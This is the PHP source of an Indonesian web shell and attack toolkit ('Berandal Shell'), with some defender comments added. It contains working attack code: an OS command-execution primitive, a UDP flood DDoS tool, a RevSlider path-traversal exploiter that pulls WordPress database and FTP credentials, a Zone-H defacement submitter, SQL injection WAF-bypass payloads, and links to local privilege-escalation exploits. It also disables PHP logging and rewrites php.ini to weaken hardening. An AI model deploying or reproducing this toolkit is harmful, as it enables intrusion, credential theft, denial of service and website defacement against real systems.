1<?php
2/*-----------------------------------------------*/
3////////////////////////////////////////////////////////
4/// Berandal Shell V1.1 © 2017 ///
5/// Code by Berandal ///
6/// Default pass: owlsquad ///
7///////////////////////////////////////////////////////
8/*-----------------------------------------------*/
// Request bootstrap: runs on every hit before any markup is sent.
// Defender note: the calls below turn off PHP error reporting, error display and error
// logging for this script, so PHP's own logs will not show its activity. When hunting for
// this file, rely on web-server access logs and file-integrity monitoring instead.
9session_start();
10error_reporting(0);
// 0 removes the execution time limit, so a single request can run indefinitely.
11set_time_limit(0);
12date_default_timezone_set("Asia/Jakarta");
13
14@clearstatcache();
// error_log / log_errors: stop PHP from recording errors raised by this script.
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17@ini_set('max_execution_time',0);
18@ini_set('output_buffering',0);
19@ini_set('display_errors', 0);
20
21
22?>
23<html>
24<head>
25<link rel="SHORTCUT ICON" href="https://scontent-sit4-1.xx.fbcdn.net/v/t34.0-12/17821053_272489359875739_1796192318_n.jpg?oh=f97c2795550c4f3fec937245a89c6579&oe=58E70169" type="image/gif">
26<title>TOOLS ONLINE BY M4L1KL8590X</title>
27<meta name="author" content="M4L1KL8590X">
28 <meta content="TOOL ITW TEAM" name=" ">
29<meta charset="UTF-8">
30<link href="http://0n3r1d3r.000webhostapp.com/itw.png" rel="icon" type="image/x-icon">
31<link href="http://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
32<script type="text/javascript" id="atixhr">(function () {
33 var fnO = null;
34 var fnS = null;
35 CXHR();
36
37 //////////
38
39 function IDBG(o, s) {
40 /*
41 // Injected Debug
42
43 // Comment this entire function body out to disable debug messages
44 if (o)
45 {
46 alert((s == null ? "" : (s.toString() + ": ")) + o.toString());
47 }
48 */
49 }
50
51 //////////
52
53 function CXHR() {
54 // Check XMLHttpRequest
55
56 if (window.XMLHttpRequest) {
57 try {
58 fnO = XMLHttpRequest.prototype.open;
59 XMLHttpRequest.prototype.open = HXHRO;
60
61 fnS = XMLHttpRequest.prototype.send;
62 XMLHttpRequest.prototype.send = HXHRS;
63 }
64 catch (x) {
65 IDBG(x, "CXHR");
66 }
67 }
68 }
69
70 //////////
71
72 function HXHRO(m, u, a, n, p) {
73 // Hooked XMLHttpRequest Open
74
75 try {
76 // HACK:
77 // Create an <a> element to force the browser
78 // to resolve any relative URLs
79 var el = document.createElement("a");
80 el.href = u;
81 this.oU = el.href;
82
83 this.oM = m.toString().toUpperCase();
84
85 if (fnO) {
86 // Call the original function
87 fnO.apply(this, arguments);
88 }
89 }
90 catch (x) {
91 IDBG(x, "HXHRO");
92 }
93 }
94
95 //////////
96
// Replacement that CXHR() installs over XMLHttpRequest.prototype.send.
// It stores the request body on the XHR object, registers HRSC as a readystatechange
// listener, forwards the call to the saved original send (fnS), and for POST requests
// publishes the method, the resolved URL and the stringified body through window.postMessage.
// NOTE(review): the target origin is "*", so any message listener on this window can read
// the POST body, which may include form fields such as credentials. Which component
// consumes the "PXHR" messages is not visible in this file; presumably the script was
// injected by a browser add-on when the page was saved. Confirm before trusting it.
97 function HXHRS(d) {
98 // Hooked XMLHttpRequest Send
99
100 try {
101 this.d = d;
102
103 // Intercept readyState changes
104 this.addEventListener("readystatechange", HRSC, false);
105
106 if (fnS) {
107 // Call the original function
108 fnS.call(this, this.d);
109 }
110
// Only POST bodies are broadcast here; HRSC broadcasts response text for any method.
111 if (this.oM == "POST") {
112 window.postMessage({ m: "PXHR", t: this.oM, u: this.oU, d: String(this.d), s: true }, "*");
113 }
114 }
115 catch (x) {
116 IDBG(x, "HXHRS");
117 }
118 }
119
120 //////////
121
122 function HRSC() {
123 try {
124 if (
125 this.readyState &&
126 (this.readyState == 4 || this.readyState == 3) &&
127 this.status &&
128 this.status >= 200 &&
129 this.status < 400
130 ) {
131 var sR = "";
132 var sT = "";
133
134 if (this.responseType) {
135 sT = this.responseType;
136 }
137
138 if (sT == "" || sT == "text" || sT == "document" || sT == "json") {
139 if (this.responseText && typeof this.responseText == "string" && this.responseText != "") {
140 sR = this.responseText;
141 }
142 else if (this.responseXML && typeof this.responseXML == "object") {
143 var xD = this.responseXML;
144 if (xD.xml) {
145 sR += new XMLSerializer().serializeToString(xD);
146 }
147 }
148 window.postMessage({ m: "PXHR", t: this.oM, u: this.oU, d: sR, s: false }, "*");
149 }
150 }
151 }
152 catch (x) {
153 IDBG(x, "HRSC");
154 }
155 }
156 }());</script>
157<style>
158body {background:url('/haxor.jpg') no-repeat fixed;
159 -webkit-background-size: 100% 100%;
160 -moz-background-size: 100% 100%;
161 -o-background-size: 100% 100%;
162 background-size: 100% 100%;;color:#fff;font-family: 'Share Tech Mono';}
163input[type=text] , input[type=file] , input[type=password] {background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border-bottom:2px solid #02BC8C;font-family: 'Share Tech Mono';margin:6px;padding:6px; -moz-border-radius: 7px; border-radius: 7px;width:35%;}
164textarea {
165 background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border:2px solid #02BC8C;font-family: 'Share Tech Mono';margin:6px;padding:6px; -moz-border-radius: 7px; border-radius: 7px;
166 width:35%;
167 height:150px;
168}
169select {
170 width: 500px;
171 background: #02BC8C;
172 color: white;
173 font-size: 13px;
174}
175option{
176 background: #fff;
177 color: #02BC8C;
178 border: 1px solid white;
179}
180option:hover {
181 background: #02BC8C;
182 color: #02BC8C;
183}
184hr{
185 color: white;
186}
187input[type=submit] {background:#02BC8C;color:white;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px;width:35%;}
188#ex {background: #2b9db5 ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
189.fak {background: #02BC8C ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
190a {text-decoration:none;color:#fff}
191 #tabnet{
192 margin-left:15px auto 0 auto;
193 margin-right:15px auto 0 auto;
194 border: 1px solid #02BC8C;
195 width: 50%;
196 }
197 th {
198 background: #02BC8C;
199 color:#2F302F;
200 }
201 td {
202 border-bottom: 1px solid #02BC8C;
203 padding: 3px;
204 }
205 #c {
206 text-align: center;
207 }
208</style>
209</head>
210<?php
// Creates a php.ini in the current working directory when none exists there.
// The content written is an attempt to relax PHP hardening directives for this directory.
// Defender note: a php.ini appearing next to web content without a matching deployment is
// an indicator of compromise. Whether a per-directory ini file is honoured depends on the
// SAPI in use (presumably CGI/FastCGI only; confirm for the host in question).
211if (file_exists("php.ini")){
212}else{
213$img = fopen('php.ini', 'w');
214$sec = "safe_mode = OFF
215disable_funtions = NONE";
216fwrite($img ,$sec);
217fclose($img);
218}
// Runs $cmd as an operating-system command and returns whatever it printed.
// The function probes system(), exec(), passthru() and shell_exec() in that order and uses
// the first one that function_exists() reports; $cmd is handed over unmodified.
// Returns the captured output as a string, or nothing (null) when none of the four exists.
// Defender note: this is the command-execution primitive of the kit. Listing all four
// functions in disable_functions leaves it with no branch to run, and a file that probes
// these four names together is a useful static signature.
219function exe($cmd) {
220if(function_exists('system')) {
// system() prints directly, so output buffering is used to capture the text instead.
221 @ob_start();
222 @system($cmd);
223 $buff = @ob_get_contents();
224 @ob_end_clean();
225 return $buff;
226 } elseif(function_exists('exec')) {
// exec() fills $results with one entry per output line; they are joined with no separator.
227 @exec($cmd,$results);
228 $buff = "";
229 foreach($results as $result) {
230 $buff .= $result;
231 } return $buff;
232 } elseif(function_exists('passthru')) {
233 @ob_start();
234 @passthru($cmd);
235 $buff = @ob_get_contents();
236 @ob_end_clean();
237 return $buff;
238 } elseif(function_exists('shell_exec')) {
239 $buff = @shell_exec($cmd);
240 return $buff;
241 }
242}
/**
 * Render a file's mode bits as an `ls -l` style ten-character string.
 *
 * The first character is the file-type flag and the remaining nine are the
 * owner/group/other rwx triplets, with setuid/setgid/sticky folded into the
 * execute position (s/S, s/S, t/T).
 *
 * @param string $file Path handed to fileperms().
 * @return string For example "-rw-r--r--"; the type flag is "u" when no known type mask matches.
 */
function perms($file){
    $mode = fileperms($file);

    // File-type masks in priority order; the first mask that is fully set wins.
    $typeFlags = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $text = 'u';
    foreach ($typeFlags as $mask => $flag) {
        if (($mode & $mask) == $mask) {
            $text = $flag;
            break;
        }
    }

    // One row per triplet: read bit, write bit, execute bit, special bit, special letter.
    $triplets = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't'),
    );
    foreach ($triplets as $row) {
        list($readBit, $writeBit, $execBit, $specialBit, $letter) = $row;
        $text .= ($mode & $readBit) ? 'r' : '-';
        $text .= ($mode & $writeBit) ? 'w' : '-';
        if ($mode & $execBit) {
            // Executable: lower-case special letter when the special bit is also set.
            $text .= ($mode & $specialBit) ? $letter : 'x';
        } else {
            // Not executable: upper-case special letter marks the special bit alone.
            $text .= ($mode & $specialBit) ? strtoupper($letter) : '-';
        }
    }
    return $text;
}
/**
 * Format a byte count for display using binary units.
 *
 * Values of 1024 and above are shown with two decimals in the largest unit
 * that fits (KB, MB or GB); smaller values are printed as-is followed by " B".
 *
 * @param int|float $s Size in bytes.
 * @return string For example "1.50 KB" or "512 B".
 */
function hdd($s) {
    // Largest unit first so the first threshold reached decides the unit.
    $units = array(
        'GB' => 1073741824,
        'MB' => 1048576,
        'KB' => 1024,
    );
    foreach ($units as $label => $divisor) {
        if ($s >= $divisor) {
            return sprintf('%1.2f', $s / $divisor) . ' ' . $label;
        }
    }
    return $s . ' B';
}
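/**
 * Return the text located between two markers ("ambil kata" = "take word").
 *
 * The search for $kata2 starts right after the first occurrence of $kata1.
 * Previously a closing marker that appeared only before the opening marker
 * passed the presence checks and produced a bogus slice from a negative
 * length; that case now returns FALSE like the other "not found" cases.
 *
 * @param string $param Text to search (byte-wise, case-sensitive).
 * @param string $kata1 Opening marker.
 * @param string $kata2 Closing marker.
 * @return string|false The enclosed text ('' when the markers are adjacent), or FALSE
 *                      when either marker is missing or the closing marker does not
 *                      follow the opening one.
 */
function ambilKata($param, $kata1, $kata2){
    $open = strpos($param, $kata1);
    if ($open === FALSE) return FALSE;

    $start = $open + strlen($kata1);
    // Also covers "closing marker absent everywhere": nothing can follow $start then.
    $end = strpos($param, $kata2, $start);
    if ($end === FALSE) return FALSE;

    return substr($param, $start, $end - $start);
}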
// Submits one entry to the notification form at the URL below and returns the raw
// response body (CURLOPT_RETURNTRANSFER makes curl_exec return it instead of printing it).
// $nick is sent as the "defacer" field and $url as "domain1"; both are interpolated into
// the POST body as given.
// Defender note: an outbound POST from a web server to this notification endpoint is
// worth alerting on in egress logs, since hosted applications presumably have no
// legitimate reason to contact it.
297function zoneh($url,$nick) {
298$ch = curl_init("http://www.zone-h.com/notify/single");
299curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
300curl_setopt($ch, CURLOPT_POST, true);
301curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
302return curl_exec($ch);
// Not reached: the function has already returned on the line above.
303curl_close($ch);
304}
// Page banner followed by the navigation menu; each link names one tool of the kit.
// The dispatcher further down picks a tool by comparing $_GET['go'] with several of the
// same keywords. How a link such as 'home' is mapped to ?go=home is not visible here;
// presumably a rewrite rule on the hosting side. Confirm.
// Defender note: the banner text and the menu labels are fixed strings, so they can serve
// as content signatures when scanning web roots or cached pages for this file.
305echo "<center><font size='7'>INDONESIA TO WORLD TOOLS</font></font></center>";
306echo "<td onkeydown='return false' onmousedown='return false'></td>";
307echo "<center></font></td></tr></table>";
308echo "<p><div id=menu border='1' >";
309echo "<ul class='sidebar-menu tree' data-widget='tree'>";
310echo "<font color=#02BC8C>[<a href='home'>Home</a>]";
311echo "[<a href='shellchecker'>shell checker</a>]";
312echo "[<a href='adfin'>admin finder</a>]";
313echo "[<a href='csrf'>csrf online</a>]";
314echo "[<a href='magento'>magento exploiter</a>]";
315echo "[<a href='zoneh'>Zone-H</a>]";
316echo "[<a href='hashgen'>hash Generator</a>]";
317echo "[<a href='hashid'>hash Identifier</a>]";
318echo "[<a href='ddos'>ddos</a>]";
319echo "[<a href='64base'>encode decode</a>]<br><br>";
320echo "[<a href='wpbrute'>wordpress brute force</a>]";
321echo "[<a href='lokmed'>cms lokomedia auto exploiter</a>]";
322echo "[<a href='lwa'>xampp lwa auto exploiter</a>]";
323echo "[<a href='drupal'>drupal mass exploiter</a>]";
324echo "[<a href='elfinder'>elfinder mass exploiter</a>]<br><br>";
325echo "[<a href='revslider'>revslider mass exploiter</a>]";
326echo "[<a href='cmsvuln'>cms Vulnerability Scanner</a>]";
327echo "[<a href='sqlbalitbang'>sql balitbang</a>]";
328echo "[<a href='roottutor'>root tutorial</a>]";
329echo "[<a href='localroot'>localroot</a>]<br><br>";
330echo "[<a href='alexa'>AlexaRanks/moz rank Mass Checker</a>]";
331echo "[<a href='domain'>domain/parse grabber</a>]";
332echo "[<a href='dnsviewer'>mass dnsviewer</a>]";
333echo "[<a href='zonesong'>take out :D</a>]</font><br><br>";
334echo "</ul>";
335echo "</font></div>";
336echo "</center>";
337
338if($_GET['go'] == 'ddos') {
339?>
340<html>
341<form action=" " method="post">
342<center><br>
343<h1>ddos tool</h1>
344Your IP: <font color="Lavender"><b><?php echo $my_ip; ?></b></font>�(Don't DoS yourself nub)<br>
345<table class="tabnet" style="width:333px;padding:0 1px;">
346<tr><tr><td>IP Target</td><td>:</td>
347<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
348</td></tr>
349<tr><td>Time</td><td>:</td>
350<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
351</td></tr>
352
353<tr><td>Port</td><td>:</td>
354<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
355</td></tr></tr></table></b><br>
356<input type="submit" class="inputzbut" name="fire" value=" submit ">
357<br><br>
358<center>
359<font color="Lavender">Seteleh selesai menggunakan tools ini segera refresh browsingmu
360</center>
361</form>
362</center>
363<?php
364 @$submit = $_POST['fire'];
365 if (isset($submit)) {
366 $packets = 0;
367 $ip = $_POST['ip'];
368 $rand = $_POST['port'];
369 set_time_limit(0);
370 ignore_user_abort(FALSE);
371 $exec_time = $_POST['time'];
372 $time = time();
373 print "Flooded: $ip on port $rand <br><br>";
374 $max_time = $time + $exec_time;
375 for ($i = 0;$i < 65535;$i++) {
376 $out.= "X";
377 }
378 while (1) {
379 $packets++;
380 if (time() > $max_time) {
381 break;
382 }
383 $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
384 if ($fp) {
385 fwrite($fp, $out);
386 fclose($fp);
387 }
388 }
389 echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
390";
391 }
392 }
393elseif ($_GET['go'] == 'dnsviewer') {
394 # code...
395echo '<center><h1>mass dns viewer</h1><hr><br><form action="" method="POST">
396<textarea name="text" placeholder="www.domain.com"></textarea>
397<br><input type="submit" name="zone" value="Check All"></form>';
398
399$sedd = explode("\r\n",$_POST["text"]);
400 $sedd1 = str_replace(['http://', 'https://'], ['', ''], $sedd);
401 $sedd2 = $sedd1 ;
402if($_POST["text"]){
403echo '<table id="tabnet"><tr><th>Hostname </th><th>Type</th><th> TTL </th><th>Priority</th><th>Content</th></tr>';
404foreach ($sedd2 as $site){
405
406$sed = file_get_contents("https://who.is/dns/".$site);
407
408preg_match_all('/<tr><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><td>(.*?)<\/td><\/tr>/',$sed,$a);
409$hitung = count($a[0]);
410$mulai = 0;
411while ($mulai < $hitung){
412 echo "<tr><td>".$a[1][$mulai]."</td><td><center>".$a[2][$mulai]."</center></td><td><center>".$a[3][$mulai]."</center></td><td><center>".$a[4][$mulai]."</center></td><td>".$a[5][$mulai]."</td></tr>";
413 $mulai++;
414}
415echo "<tr><th></th><th></th><th></th><th></th><th></th></tr>";
416echo "<tr><th></th><th></th><th></th><th></th><th></th></tr>";
417}
418echo "</table></center>";
419}
420}
421elseif ($_GET['go'] == 'python') {
422echo "<iframe src='https://trinket.io/embed/python/1f858f3553' width='100%' height='356' frameborder='0' marginwidth='0' marginheight='0' allowfullscreen></iframe>";
423}
424 elseif ($_GET['go'] == 'localroot') {
425echo '<center><h1>localroot</h1><hr color="white"><br><br><br>
426 <font color=#02BC8C>[<a href="Localroot/CVE-2004-0077/160.c"> CVE-2004-0077 </a>]
427 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2004-1235/744.c"> CVE-2004-1235 </a>]
428 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2005-0736/1397.c"> CVE-2005-0736 </a>]
429 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2005-1263/25647.sh"> CVE-2005-1263 </a>]
430 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2006-2451/2031.c"> CVE-2006-2451 </a>]
431 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2006-3626/2013.c"> CVE-2006-3626 </a>]
432 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2012-0056/18411.c"> CVE-2012-0056 </a>]
433 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2012-3524/dzug.c"> CVE-2012-3524 </a>]
434 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2015-1328/37292.c"> CVE-2015-1328 </a>]
435 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2015-7547/CVE-2015-7547-client.c"> CVE-2015-7547 </a>]
436 [<a href="https://byagent.xyz/exploit/Localroot/2016/firehawk.zip"> CVE-2016 </a>]
437 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-6074/poc.c"> CVE-2017-6074 </a>]
438 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-7308/poc.c"> CVE-2017-7308 </a>]
439 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-7494/implant.c"> CVE-2017-7494 </a>]
440 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-1000112/poc.c"> CVE-2017-1000112 </a>]
441 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2017-1000367/sudopwn.c"> CVE-2017-1000367 </a>]
442 [<a href="https://byagent.xyz/exploit/Localroot/CVE-2018-1000001/RationalLove.c"> CVE-2018-1000001 </a>]</font></center><br><br><br><br><br><br><br><br><br><br><br>';
443}
444elseif ($_GET['go'] == 'sqlbasic') {
445echo "<center><table id='tabnet'><tr><th> waf </th>
446<tr><td>union+distinct+select+</td></tr><tr><td>union+distinct+select+</td></tr></center><br>
447<tr><td>union+distinct+select+</td></tr>
448<tr><td>+union+distinctROW+select+</td></tr>
449<tr><td>+%2F**/+Union/*!select*/</td></tr>
450<tr><td>/**//*!12345UNION SELECT*//**/</td></tr>
451<tr><td>/**//*!50000UNION SELECT*//**/</td></tr>
452<tr><td>/**/uniUNIONon/**/selSELECTect/**/</td></tr>
453<tr><td>+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+</td></tr>
454<tr><td>+/*!u%6eion*/+/*!se%6cect*/+</td></tr>
455<tr><td>%55nion %53elect</td></tr>
456<tr><td>union(select(1),2,3) </td></tr>
457<tr><td>union (select 1111,2222,3333) </td></tr>
458<tr><td>union (/*!/**/ SeleCT */ 11)</td></tr></table><tr><th></th>";
459}
460 elseif ($_GET['go'] == 'home') {
461echo "<center><b>welcome root,happy working ster<br>congratulations, you are a freelancer</b><br><br><img src='http:///laptop-notepad-img.svg' style: width=250px><br><br><br></center>";
462}
463 elseif($_GET['go'] == 'zoneh') {
464 if($_POST['submit']) {
465 $domain = explode("\r\n", $_POST['url']);
466 $nick = $_POST['nick'];
467 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
468 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
469 foreach($domain as $url) {
470 $zoneh = zoneh($url,$nick);
471 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
472 echo "$url -> <font color=lime>OK</font><br>";
473 } else {
474 echo "$url -> <font color=red>ERROR</font><br>";
475 }
476 }
477 } else {
478 echo "<center><h1>zone h mass mirror</h1><hr color='white'><br><form method='post'>
479 <u>Defacer</u>: <br>
480 <input type='text' name='nick' size='50' value='M4L1KL8590X'><br>
481 <u>Domains</u>: <br>
482 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
483 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
484 </form>";
485 }
486 echo "</center>";
487}
488 elseif ($_GET['go'] == 'shellchecker') {
489?>
490<center>
491<h1>shellchecker</h1><hr color='white'>
492<form action='' method='post'>
493<center>
494<form name="frmcontadd" action="" method="post">
495<textarea name='url' cols='50' rows='10'></textarea>
496<br><br><input class="subbtn" type="submit" name="Submit" value="check now!"><br><br><br></form>
497<?php
498// Code By : Arvan Apriyana
499// Hargain Karya Kami Jangan Senaknya Mengaku Ngakui
500// Anda Menghargai Saya Hargai :)
501function get_http_response_code($theurl) {
502 $headers = get_headers($theurl);
503 $status = substr($headers[0], 9, 3);
504 $p = parse_url($theurl);
505 $host = explode(':', $p['host']);
506 $hostname = $host[0];
507 if ($status == 200) {
508 $visitor = $_SERVER["REMOTE_ADDRS"];
509 $judul = "shell:login:wso:XxX:TATSUMI:tatsumi:IndoXploit:Cowo:Priv8:private:jnck:jancok:v2:v1:v3:v5:idx:2018:2017:2016:2015:AchonXjusT:HalahLemot:Cox:cox:GBLG LO:$theurl ";
510 //memanfaatkan title shell backdoor
511 $body = "shell:PARTY-MINI SHELL:root@indoxploit:cowo:3.10.0-514.26.2:32:Linux:ubuntu:Safe Mode:OFF:ON:priv8:private:masukin:password:nya:$theurl"
512 ;
513 //memanfaatkan header shell backdoor
514 if (!empty($theurl)) {
515 @mail($judul, $body);
516 }
517 $writeuRl = $theurl . "
518";
519 $fh = fopen("a");
520 fwrite($fh, $writeuRl, strlen($writeuRl));
521 echo "<strong><font color=Green>Live </font></strong><a href='$theurl' target='$theurl'>" . $theurl . "</a><br />";
522 } elseif ($status == 500) {
523 echo "<strong><font color=black>" . $status . " 500 Internal Server Error !</font></strong> - <a href=. $theurl
524 target=_blank>" . $theurl . "</a><br />";
525 } else {
526 $writeuRl = $theurl . "
527";
528 $fh = fopen("a");
529 fwrite($fh, $writeuRl, strlen($writeuRl));
530 echo "<strong><font color=red>Die </font></strong><a href='$theurl' target='$theurl'>" . $theurl . "</a><br />";
531 }
532}
533if (isset($_POST['Submit'])) {
534 $hosts = explode("
535", $_POST['url']);
536
537 $values = array();
538 foreach ($hosts as $host) {
539 if ($host != "") {
540 @get_http_response_code("$host");
541 }
542 }
543 echo "<br /><strong>Selesai</strong>";
544}
545}
546
547elseif ($_GET['go'] == 'Balitbang') {
548?>
549<center>
550<h1>CMS Balitbang Auto Exploiter</h1><hr color='white'>
551<form action='' method='post'>
552<center>
553<p>Target URL : <input style='border-color=white;' type='text' name='url' class='text'
554
555placeholder='http://127.0.0.1/' size="50"></p>
556</p>
557<p><input type='submit' name='send' class='kotak' style='border-color=white;' value='Kunci Target'></p></center>
558</form>
559<?php
560if (isset($_POST['send'])) {
561 $url = $_POST['url'];
562 $resulturl = "Target URL : $url";
563 echo "<center>
564<hr color='white'><br>
565$resulturl
566$resultoken
567</center>";
568echo '<center style="border-color=white;"><form enctype="multipart/form-data" action="'.
569
570$url.'?src=http://flickr.com.phuoclongcomputer.com/up.php" method="post"></center>';
571echo '<center style="border-color=white;"></center>';
572}
573echo "</div>";
574}
575elseif($_GET['go'] == 'hashgen') {
576$submit = $_POST['enter'];
577 if (isset($submit)) {
578$pass = $_POST['password']; // password
579$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
580$hash = md5($pass); // md5 hash #1
581$md4 = hash("md4", $pass);
582$hash_md5 = md5($salt . $pass); // md5 hash with salt #2
583$hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
584$hash1 = sha1($pass); // sha1 hash #4
585$sha256 = hash("sha256", $text);
586$hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
587$hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
588}
589echo '<form action="" method="post"><b> ';
590echo '<center><h1>hash Generator</h1><hr color="white"></tr>';
591echo ' <center><b>masukan kata yang ingin di encrypt:</b><br>';
592echo ' <input class="inputz" type="text" name="password" size="40" />';
593echo ' <input class="inputzbut" type="submit" name="enter" value="hash" />';
594echo ' <center><br>Hasil Hash</th></center></tr>';
595echo ' <center>For :<br><input class=inputz type=text size=50 value=' . $pass . '><br>';
596echo ' <center><center><center><center><center>MD5 :<br><input class=inputz type=text size=50 value=' . $hash . '><br>';
597echo ' <center><center><center><center>MD4 :<br><input class=inputz type=text size=50 value=' . $md4 . '><br>';
598echo ' <center><center><center>MD5 with Salt :<br><input class=inputz type=text size=50 value=' . $hash_md5 . '><br>';
599echo ' <center><center>MD5 with Salt & Sha1 :<br><input class=inputz type=text size=50 value=' . $hash_md5_double . '><br>';
600echo ' <center>Sha1 :<br><input class=inputz type=text size=50 value=' . $hash1 . '><br>';
601echo ' Sha256 :<br><input class=inputz type=text size=50 value=' . $sha256 . '><br>';
602echo ' <center><center>Sha1 with Salt :<br><input class=inputz type=text size=50 value=' . $hash1_sha1 . '><br>';
603echo ' <center>Sha1 with Salt & MD5 :<br><input class=inputz type=text size=50 value=' . $hash1_sha1_double . '><br>';
604}
605elseif ($_GET['go'] == 'revslider') {
606 echo " <hr color='white'>
607<form method='post'>
608<textarea class='mybox' name='site' cols='50' rows='12'>
609http://site.com
610http://site2.com
611http://site3.com</textarea><br>
612<input class='kotak' type='submit' style='width: 50px; height: 30px; border-color:white;margin:10px 2px 0 2px;' name='sikat' value='SIKAT!'>
613</form></center>
614";
/**
 * Slice out the text lying between $starttag and $endtag, matching both
 * markers case-insensitively.
 *
 * The end marker is searched from one byte past the end of the start marker,
 * so an empty enclosed value is never matched directly. No check is made that
 * either marker was actually found.
 *
 * @param string $mytext   Text to search.
 * @param string $starttag Marker preceding the wanted text.
 * @param string $endtag   Marker following the wanted text.
 * @return string The enclosed text when both markers are present in that order.
 */
function findit($mytext,$starttag,$endtag) {
    $from = strlen($starttag) + stripos($mytext, $starttag);
    $length = stripos($mytext, $endtag, $from + 1) - $from;
    return substr($mytext, $from, $length);
}
620error_reporting(0);
621set_time_limit(0);
622$ya=$_POST['sikat'];
623$co=$_POST['site'];
624
625if($ya){
626 $e=explode("\r\n",$co);
627 foreach($e as $bda){
628 //echo '<br>'.$bda;
629 $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
630 $dn=($bda).($linkof);
631 $file=@file_get_contents($dn);
632 if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
633 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
634 echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
635 echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
636 echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
637 echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
638 echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
639 }
640 elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
641 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
642 echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
643 echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
644 echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
645 echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
646 }
647 else{echo "<center><font face='courier' color='red' >".$bda." ----> not infected </font></center>";}
648 echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
649}
650}
651}
652elseif ($_GET['go'] == adfin) {
653 ?>
654<type='text/javascript'/></script>
655<style>
656</style>
657
658</head>
659<link rel="SHORTCUT ICON" href="http://i.imgur.com/2Koa43H.png">
660<html></style><center><div class="mybox"><h1>Admin Finder</h1><hr color='white'><br>
661<br>
662<br><center><font color='Lavenda'> NB: Jika Mau Jalankan Tools ini,di Belakang Domain Tambahkan " / " </font></center>
663<br>
664<td width=100% id=Gretz>
665<form action="" method="post">
666<center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
667<input name="submit_lol" class="textbox" value="Submit Site" type="submit">
668</form>
669</html>
670<?php
671set_time_limit(0);
672
673if (isset($_POST["submit_lol"])) {
674$url = $_POST['hash_lol'];
